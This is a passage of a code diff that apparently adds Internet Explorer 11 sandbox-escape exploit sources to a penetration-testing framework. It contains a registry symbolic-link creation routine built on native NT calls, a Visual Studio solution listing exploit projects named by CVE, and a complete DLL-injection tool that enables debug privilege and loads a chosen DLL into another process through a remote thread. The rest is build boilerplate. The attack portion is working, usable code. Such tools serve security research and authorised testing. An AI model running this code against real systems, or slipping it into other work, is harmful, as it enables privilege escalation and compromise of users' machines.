||||
nt_object_attributes.Length = sizeof(OBJECT_ATTRIBUTES);
|
||||
|
||||
// create the key
|
||||
if (opt_volatile)
|
||||
status = NtCreateKey(&hdl_nt_keyhandle, KEY_ALL_ACCESS, &nt_object_attributes, 0, NULL, REG_OPTION_VOLATILE | REG_OPTION_CREATE_LINK, &disposition);
|
||||
else
|
||||
status = NtCreateKey(&hdl_nt_keyhandle, KEY_ALL_ACCESS, &nt_object_attributes, 0, NULL, REG_OPTION_NON_VOLATILE | REG_OPTION_CREATE_LINK, &disposition);
|
||||
|
||||
if (status == 0) {
|
||||
DebugPrintf("DEBUG: Key %ls created successfully.\n", par_src);
|
||||
|
||||
// the real action is here:
|
||||
|
||||
nt_valuename.Buffer = REG_LINK_VALUE_NAME;
|
||||
nt_valuename.Length = wcslen(REG_LINK_VALUE_NAME) * sizeof(WCHAR);
|
||||
|
||||
status = NtSetValueKey(hdl_nt_keyhandle, &nt_valuename, 0, REG_LINK, par_dst, wcslen(par_dst) * sizeof(WCHAR));
|
||||
|
||||
if (status == 0) {
|
||||
DebugPrintf("DEBUG: Value REG_LINK:%ls=%ls set succesfully.\n", REG_LINK_VALUE_NAME, par_dst);
|
||||
}
|
||||
else {
|
||||
DebugPrintf("ERROR: Link creation failed. [Step 2] [Error %08X]\n", status);
|
||||
return 1;
|
||||
}
|
||||
}
|
||||
else {
|
||||
DebugPrintf("ERROR: Link creation failed. [Step 1] [Error %08X]\n", status);
|
||||
return 1;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
int ntapi_init(void) {
|
||||
#ifdef DEBUG
|
||||
DebugPrintf("DEBUG: Initializing NTDLL.DLL:NtCreateKey...\n");
|
||||
#endif
|
||||
if(!(NtCreateKey = (fNtCreateKey) GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtCreateKey" ))) {
|
||||
DebugPrintf("This program works only on Windows NT/2000/XP/NET\n");
|
||||
return 1;
|
||||
}
|
||||
#ifdef DEBUG
|
||||
DebugPrintf("DEBUG: Initializing NTDLL.DLL:NtDeleteKey...\n");
|
||||
#endif
|
||||
if(!(NtDeleteKey = (fNtDeleteKey) GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtDeleteKey" ))) {
|
||||
DebugPrintf("This program works only on Windows NT/2000/XP/NET\n");
|
||||
return 1;
|
||||
}
|
||||
#ifdef DEBUG
|
||||
DebugPrintf("DEBUG: Initializing NTDLL.DLL:NtSetValueKey...\n");
|
||||
#endif
|
||||
if(!(NtSetValueKey = (fNtSetValueKey) GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtSetValueKey" ))) {
|
||||
DebugPrintf("This program works only on Windows NT/2000/XP/NET\n");
|
||||
return 1;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
|
@ -0,0 +1,70 @@
|
|||
/*--------------------------------------------------------------------
|
||||
REGLN - Manage Windows Rregistry Links V20R0
|
||||
======================================================================
|
||||
Antoni Sawicki <as@ntinternals.net>; Dublin, July 10 2005;
|
||||
|
||||
The following Copyrights apply:
|
||||
|
||||
Copyright (c) 1998-2005 by Antoni Sawicki <as@ntinternals.net>
|
||||
Copyright (c) 1998-2005 by Tomasz Nowak <tommy@ntinternals.net>
|
||||
Copyright (c) 1998 by Mark Russinovich <mark@sysinternals.com>
|
||||
|
||||
License:
|
||||
|
||||
This software is distributed under the terms and conditions of
|
||||
GPL - GNU General Public License. The software is provided AS
|
||||
IS and ABSOLUTELY NO WARRANTY IS GIVEN. The author takes no
|
||||
responsibility for any damages or consequences of usage of this
|
||||
software. For more information, please read the attached GPL.TXT.
|
||||
|
||||
--------------------------------------------------------------------*/
|
||||
|
||||
|
||||
|
||||
#define REG_LINK_VALUE_NAME L"SymbolicLinkValue" // found by tenox
|
||||
//#define REG_OPTION_CREATE_LINK 2 // this is defined in MSVC 2.0 but not after
|
||||
#define REG_OPTION_OPEN_LINK_ATTR 0x100 // found by tommy
|
||||
#define OBJ_CASE_INSENSITIVE 0x40
|
||||
|
||||
//
|
||||
// Following definitions are generously provided by Mark Russinovitch
|
||||
//
|
||||
typedef struct _UNICODE_STRING {
|
||||
WORD Length;
|
||||
WORD MaximumLength;
|
||||
PCWSTR Buffer;
|
||||
} UNICODE_STRING;
|
||||
typedef UNICODE_STRING *PUNICODE_STRING;
|
||||
|
||||
typedef struct _OBJECT_ATTRIBUTES {
|
||||
DWORD Length;
|
||||
HANDLE RootDirectory;
|
||||
PUNICODE_STRING ObjectName;
|
||||
DWORD Attributes;
|
||||
PVOID SecurityDescriptor;
|
||||
PVOID SecurityQualityOfService;
|
||||
} OBJECT_ATTRIBUTES;
|
||||
typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;
|
||||
|
||||
typedef DWORD (__stdcall *fNtCreateKey)(
|
||||
HANDLE KeyHandle,
|
||||
DWORD DesiredAccess,
|
||||
POBJECT_ATTRIBUTES ObjectAttributes,
|
||||
DWORD TitleIndex,
|
||||
PUNICODE_STRING Class,
|
||||
DWORD CreateOptions,
|
||||
PDWORD Disposition
|
||||
);
|
||||
|
||||
typedef DWORD (__stdcall *fNtSetValueKey)(
|
||||
HANDLE KeyHandle,
|
||||
PUNICODE_STRING ValueName,
|
||||
DWORD TitleIndex,
|
||||
DWORD Type,
|
||||
const void* Data,
|
||||
DWORD DataSize
|
||||
);
|
||||
|
||||
typedef DWORD (__stdcall *fNtDeleteKey)(
|
||||
HANDLE KeyHandle
|
||||
);
|
|
@ -0,0 +1,8 @@
|
|||
// stdafx.cpp : source file that includes just the standard includes
|
||||
// CommandUtils.pch will be the pre-compiled header
|
||||
// stdafx.obj will contain the pre-compiled type information
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
// TODO: reference any additional headers you need in STDAFX.H
|
||||
// and not in this file
|
|
@ -0,0 +1,15 @@
|
|||
// stdafx.h : include file for standard system include files,
|
||||
// or project specific include files that are used frequently, but
|
||||
// are changed infrequently
|
||||
//
|
||||
|
||||
#pragma once
|
||||
|
||||
#include "targetver.h"
|
||||
|
||||
#include <tchar.h>
|
||||
#include <Windows.h>
|
||||
#include <strsafe.h>
|
||||
#include <vector>
|
||||
#include <string>
|
||||
#include <sstream>
|
|
@ -0,0 +1,8 @@
|
|||
#pragma once
|
||||
|
||||
// Including SDKDDKVer.h defines the highest available Windows platform.
|
||||
|
||||
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
|
||||
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
|
||||
|
||||
#include <SDKDDKVer.h>
|
|
@ -0,0 +1,72 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio 2013
|
||||
VisualStudioVersion = 12.0.30501.0
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InjectDll", "InjectDll\InjectDll.vcxproj", "{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}"
|
||||
EndProject
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2013-5045", "CVE-2013-5045\CVE-2013-5045.vcxproj", "{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}"
|
||||
EndProject
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CommonUtils", "CommonUtils\CommonUtils.vcxproj", "{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}"
|
||||
EndProject
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2013-5046", "CVE-2013-5046\CVE-2013-5046.vcxproj", "{7A9AC14A-00BC-4A69-9B86-C80635606FEA}"
|
||||
EndProject
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2014-0268", "CVE-2014-0268\CVE-2014-0268.vcxproj", "{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}"
|
||||
EndProject
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2014-0257", "CVE-2014-0257\CVE-2014-0257.vcxproj", "{2A46841E-E3FC-42FF-BCDF-70F76E757E26}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|Win32 = Debug|Win32
|
||||
Debug|x64 = Debug|x64
|
||||
Release|Win32 = Release|Win32
|
||||
Release|x64 = Release|x64
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||
{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Debug|x64.Build.0 = Debug|x64
|
||||
{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Release|Win32.ActiveCfg = Release|Win32
|
||||
{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Release|x64.ActiveCfg = Release|x64
|
||||
{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Release|x64.Build.0 = Release|x64
|
||||
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|Win32.Build.0 = Debug|Win32
|
||||
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|x64.Build.0 = Debug|x64
|
||||
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|Win32.ActiveCfg = Release|Win32
|
||||
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|Win32.Build.0 = Release|Win32
|
||||
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|x64.ActiveCfg = Release|x64
|
||||
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|x64.Build.0 = Release|x64
|
||||
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|Win32.Build.0 = Debug|Win32
|
||||
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|x64.Build.0 = Debug|x64
|
||||
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|Win32.ActiveCfg = Release|Win32
|
||||
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|Win32.Build.0 = Release|Win32
|
||||
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|x64.ActiveCfg = Release|x64
|
||||
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|x64.Build.0 = Release|x64
|
||||
{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||
{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Debug|x64.Build.0 = Debug|x64
|
||||
{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Release|Win32.ActiveCfg = Release|Win32
|
||||
{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Release|x64.ActiveCfg = Release|x64
|
||||
{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Release|x64.Build.0 = Release|x64
|
||||
{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||
{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Debug|x64.Build.0 = Debug|x64
|
||||
{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Release|Win32.ActiveCfg = Release|Win32
|
||||
{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Release|x64.ActiveCfg = Release|x64
|
||||
{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Release|x64.Build.0 = Release|x64
|
||||
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|Win32.Build.0 = Debug|Win32
|
||||
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|x64.Build.0 = Debug|x64
|
||||
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|Win32.ActiveCfg = Release|Win32
|
||||
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|Win32.Build.0 = Release|Win32
|
||||
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|x64.ActiveCfg = Release|x64
|
||||
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|x64.Build.0 = Release|x64
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
EndGlobal
|
|
@ -0,0 +1,107 @@
|
|||
// This file is part of IE11SandboxEsacapes.
|
||||
|
||||
// IE11SandboxEscapes is free software: you can redistribute it and/or modify
|
||||
// it under the terms of the GNU General Public License as published by
|
||||
// the Free Software Foundation, either version 3 of the License, or
|
||||
// (at your option) any later version.
|
||||
|
||||
// IE11SandboxEscapes is distributed in the hope that it will be useful,
|
||||
// but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
// GNU General Public License for more details.
|
||||
|
||||
// You should have received a copy of the GNU General Public License
|
||||
// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>.
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)
|
||||
{
|
||||
TOKEN_PRIVILEGES tp;
|
||||
LUID luid;
|
||||
|
||||
if(!LookupPrivilegeValue(NULL, lpszPrivilege, &luid))
|
||||
{
|
||||
printf("Error 1 %d\n", GetLastError());
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
tp.PrivilegeCount = 1;
|
||||
tp.Privileges[0].Luid = luid;
|
||||
if(bEnablePrivilege)
|
||||
{
|
||||
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
|
||||
}
|
||||
else
|
||||
{
|
||||
tp.Privileges[0].Attributes = 0;
|
||||
}
|
||||
|
||||
if(!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
|
||||
{
|
||||
printf("Error adjusting privilege %d\n", GetLastError());
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
if(GetLastError() == ERROR_NOT_ALL_ASSIGNED)
|
||||
{
|
||||
printf("Not all privilges available\n");
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
|
||||
int _tmain(int argc, _TCHAR* argv[])
|
||||
{
|
||||
if(argc < 3)
|
||||
{
|
||||
printf("Usage: InjectDll pid PathToDll\n");
|
||||
return 1;
|
||||
}
|
||||
|
||||
WCHAR path[MAX_PATH];
|
||||
|
||||
GetFullPathName(argv[2], MAX_PATH, path, nullptr);
|
||||
int pid = wcstoul(argv[1], 0, 0);
|
||||
|
||||
printf("Injecting DLL: %ls into PID: %d\n", path, pid);
|
||||
|
||||
HANDLE hToken;
|
||||
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken);
|
||||
|
||||
SetPrivilege(hToken, SE_DEBUG_NAME, TRUE);
|
||||
|
||||
HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, pid);
|
||||
if(hProcess)
|
||||
{
|
||||
size_t strSize = (wcslen(path) + 1) * sizeof(WCHAR);
|
||||
LPVOID pBuf = VirtualAllocEx(hProcess, 0, strSize, MEM_COMMIT, PAGE_READWRITE);
|
||||
if(pBuf == NULL)
|
||||
{
|
||||
printf("Couldn't allocate memory in process\n");
|
||||
return 1;
|
||||
}
|
||||
SIZE_T written;
|
||||
if (!WriteProcessMemory(hProcess, pBuf, path, strSize, &written))
|
||||
{
|
||||
printf("Couldn't write to process memory\n");
|
||||
return 1;
|
||||
}
|
||||
|
||||
LPVOID pLoadLibraryW = GetProcAddress(GetModuleHandle(L"kernel32"), "LoadLibraryW");
|
||||
|
||||
if(!CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pLoadLibraryW, pBuf, 0, NULL))
|
||||
{
|
||||
printf("Couldn't create remote thread %d\n", GetLastError());
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
printf("Couldn't open process %d\n", GetLastError());
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
155
external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.vcxproj
vendored
Executable file
155
external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.vcxproj
vendored
Executable file
|
@ -0,0 +1,155 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<ProjectGuid>{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}</ProjectGuid>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<RootNamespace>InjectDll</RootNamespace>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="stdafx.h" />
|
||||
<ClInclude Include="targetver.h" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="InjectDll.cpp" />
|
||||
<ClCompile Include="stdafx.cpp">
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
|
@ -0,0 +1,8 @@
|
|||
// stdafx.cpp : source file that includes just the standard includes
|
||||
// InjectDll.pch will be the pre-compiled header
|
||||
// stdafx.obj will contain the pre-compiled type information
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
// TODO: reference any additional headers you need in STDAFX.H
|
||||
// and not in this file
|
|
@ -0,0 +1,12 @@
|
|||
// stdafx.h : include file for standard system include files,
|
||||
// or project specific include files that are used frequently, but
|
||||
// are changed infrequently
|
||||
//
|
||||
|
||||
#pragma once
|
||||
|
||||
#include "targetver.h"
|
||||
|
||||
#include <stdio.h>
|
||||
#include <tchar.h>
|
||||
#include <Windows.h>
|
|
@ -0,0 +1,8 @@
|
|||
#pragma once
|
||||
|
||||
// Including SDKDDKVer.h defines the highest available Windows platform.
|
||||
|
||||
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
|
||||
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
|
||||
|
||||
#include <SDKDDKVer.h>
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue